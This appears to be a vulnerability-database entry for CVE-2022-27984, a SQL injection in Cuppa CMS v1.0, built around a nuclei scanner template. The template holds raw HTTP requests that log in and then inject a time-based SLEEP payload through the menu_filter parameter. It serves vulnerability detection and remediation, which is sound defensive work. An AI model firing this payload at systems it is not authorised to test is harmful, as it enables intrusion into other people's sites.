Lucene search
K

Cuppa CMS v1.0 - SQL injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Cuppa CMS v1.0 SQL injection via menu_filter parameter at /administrator/templates/default/html/windows/right.php. Leads to unauthorized access, data leakage, and potential CMS compromise

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-27984
26 Apr 202214:15
attackerkb
Circl
CVE-2022-27984
26 Apr 202218:37
circl
CNNVD
CuppaCMS SQL注入漏洞
26 Apr 202200:00
cnnvd
CNVD
CuppaCMS SQL Injection Vulnerability (CNVD-2022-63582)
28 Apr 202200:00
cnvd
CVE
CVE-2022-27984
26 Apr 202213:58
cve
Cvelist
CVE-2022-27984
26 Apr 202213:58
cvelist
NVD
CVE-2022-27984
26 Apr 202214:15
nvd
OSV
CVE-2022-27984
26 Apr 202214:15
osv
Prion
Sql injection
26 Apr 202214:15
prion
RedhatCVE
CVE-2022-27984
22 May 202522:39
redhatcve
Rows per page
id: CVE-2022-27984

info:
  name: Cuppa CMS v1.0 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984).
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-27984
    - https://www.cuppacms.com/
    - http://cuppa.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-27984
    cwe-id: CWE-89
    epss-score: 0.06922
    epss-percentile: 0.93323
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        @timeout: 20s
        POST /templates/default/html/windows/right.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "components/menu/classes/functions.php")'
        condition: and
# digest: 490a004630440220133c8c25ce3c71624e4c699b2941770f1d47a4542657ce67eeb7cfc938a1ed8d022075dc84e1b76d58892f47f9ecfdad6306df711288c934b90a9c341acc9f749c10:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.06922
22